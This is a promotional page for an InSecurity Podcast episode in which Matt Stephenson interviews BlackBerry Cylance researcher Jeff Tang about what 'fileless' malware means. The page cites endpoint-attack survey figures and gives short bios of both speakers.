InSecurity Podcast: Jeff Tang on Demystifying “Fileless” Malware

“The only difference between a hacker and a remote systems administrator is who is employing them…” ~ Unknown

Care to hear some numbers that might scare you? Alternatively they might confirm what you already know. Then again, they might just be numbers…

  • 63%  percent of security professionals say the frequency of attacks has gone up over the past twelve months, according to Ponemon's 2018 State of Endpoint Security Risk report
  • 52% of respondents in the same survey said all attacks cannot be realistically stopped, and their antivirus solutions are blocking only 43% of attacks
  • 62% of respondents said that their organizations had experienced one or more endpoint attacks that resulted in a data breach (6 Ways Malware Can Bypass Endpoint Protection)

By now, most people are familiar with the concept of file-based malware. Malware is typically delivered in the form of executable files. When it comes to “fileless” malware however, there’s a lot of confusion and misunderstanding due to the evolving nature of the term.

Fileless malware originally took shape in the form of exploit payloads that reside only in memory that never touched the hard drive. Later on, the endpoint security industry evolved it to encompass file formats that were not traditionally recognized as executable, but instead served as a host container to run arbitrary code. As attackers have revamped their techniques, the term has gone on to include misusing built-in operating system utilities and living-of-the-land attacks to conduct their operations.

In this episode of the InSecurity Podcast, Matt Stephenson spends some time with Jeff Tang to find out what the hell all this means and why it matters. Think you know? You might want to tune in just to make sure!

About Jeff Tang

Jeff Tang (@mrjefftang) is a Senior Security Researcher at BlackBerry Cylance focused on operating systems and vulnerability research. He started his career as a Global Network Exploitation & Vulnerability Analyst at the National Security Agency, where he conducted computer network exploitation operations in support of national security requirements.

Prior to BlackBerry Cylance, Jeff served as the Chief Scientist at VAHNA to develop a security platform for identifying targeted network intrusions, and also worked as a CNO Developer at ManTech where he researched tools, techniques and countermeasures in computer network vulnerabilities.

Jeff completed his Bachelor of Science (BSc) in Electrical Engineering and Computer Science at the University of California, Berkeley, and a Master of Science (MSc) in Offensive Computer Security at Eastern Michigan University.

About Matt Stephenson

Insecurity Podcast host Matt Stephenson (@packmatt73) leads the Security Technology team at BlackBerry Cylance, which puts him in front of crowds, cameras, and microphones all over the world. He is the regular host of the InSecurity Podcast and host of CylanceTV.

Twenty years of work with the world’s largest security, storage, and recovery companies has introduced Matt to some of the most fascinating people in the industry. He wants to get those stories told so that others can learn from what has come before.